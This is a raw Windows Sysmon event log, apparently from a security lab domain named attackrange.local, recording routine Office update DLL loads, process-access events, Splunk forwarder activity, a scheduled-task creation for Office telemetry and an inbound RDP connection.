Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\msvcr100.dllMD5=DF3CA8D16BDED6A54977B30E66864D33,SHA256=1D1A1AE540BA132F998D60D3622F0297B6E86AE399332C3B47462D7C0F560A36,IMPHASH=1208BCDC77CFFEE6A6813646321CFC79truetrue 23542300x800000000000000071602Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.016{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\msvcp140_1.dllMD5=A0B595F95BE9CCE12BFF7EF199F874C4,SHA256=B05F3DFD4E999C3E110219FB59151CBAA322757F4F3CE52B64DDDC853E5C105C,IMPHASH=A1D1434DDDB062F5F5D6615852DEF52Btruetrue 23542300x800000000000000071601Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.016{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\msvcp140.dllMD5=A1D30EF2114E18E26E2BB96555BE81BF,SHA256=F87819AE8C6F7C90D3237A1ABB9809E8CBA9DCD0C80AC3F0969A5E68EF652CA4,IMPHASH=C0E775D13A8146396B3DE4DC441694A7truetrue 23542300x800000000000000071600Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\msvcp120.dllMD5=46060C35F697281BC5E7337AEE3722B1,SHA256=2ABF0AAB5A3C5AE9424B64E9D19D9D6D4AEBC67814D7E92E4927B9798FEF2848,IMPHASH=D0A59246EAB41D54812CD63C2326E1F1truetrue 23542300x800000000000000071599Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\msvcp110.dllMD5=7CAA1B97A3311EB5A695E3C9028616E7,SHA256=27F394AE01D12F851F1DEE3632DEE3C5AFA1D267F7A96321D35FD43105B035AD,IMPHASH=AC5237467F598A9A5B370A14ECCC4DC8truetrue 10341000x800000000000000049848Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:54.840{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EB7A-607E-DB06-00000000BB01}3656C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049847Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:54.840{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049846Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:54.840{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049845Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:54.840{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049844Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:54.840{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049843Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:54.840{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049842Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:54.840{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049841Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:54.840{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049840Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:54.840{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049839Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:54.840{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049838Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:54.840{85C0FFC9-B7EC-607E-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{85C0FFC9-EB7A-607E-DB06-00000000BB01}3656C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049837Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:54.840{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EB7A-607E-DB06-00000000BB01}3656C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049836Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:54.841{85C0FFC9-EB7A-607E-DB06-00000000BB01}3656C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000049835Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:54.746{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8B6F827427244FCB4FB1C89E5B9B45AC,SHA256=D67110E74B105422418E8697C84E993A97037D1794657A66C7ABD337CB99CC8B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049834Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:52.594{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54166-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049833Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:54.324{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=449D3780C6CBD48377873CEE95F33902,SHA256=E681A3C6408FD91A9F737B39629AC3817BE4E561BC8FCE158B2FB5EDF8638AD1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000071928Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.985{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071927Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.985{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071926Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.985{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071925Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.985{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071924Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.985{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EB7B-607E-8A0B-00000000BB01}3212C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000071923Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.985{A7A01FEF-EB7A-607E-7E0B-00000000BB01}51165328C:\Program Files\Microsoft Office\root\integration\integrator.exe{A7A01FEF-EB7B-607E-8A0B-00000000BB01}3212C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a2c1|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a470|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9acd6|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2e73a8|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2e5a66|C:\Program Files\Microsoft Office\root\integration\integrator.exe+14b46|C:\Program Files\Microsoft Office\root\integration\integrator.exe+1403d|C:\Program Files\Microsoft Office\root\integration\integrator.exe+13f75|C:\Program Files\Microsoft Office\root\integration\integrator.exe+28b75|C:\Program Files\Microsoft Office\root\integration\integrator.exe+340078|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000071922Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.995{A7A01FEF-EB7B-607E-8A0B-00000000BB01}3212C:\Windows\System32\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exeschtasks.exe /Create /tn "Microsoft\Office\OfficeTelemetryAgentLogOn2016" /XML "C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\Integration\Integrator.exeintegrator.exe /U /Extension /Msi /License PRIDName= PackageGUID="9AC08E99-230B-47e8-9721-4577B7F124EA" PackageRoot="C:\Program Files\Microsoft Office\root" 10341000x800000000000000071921Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.985{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EB7B-607E-880B-00000000BB01}5800C:\Windows\system32\schtasks.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071920Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.985{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EB7B-607E-880B-00000000BB01}5800C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 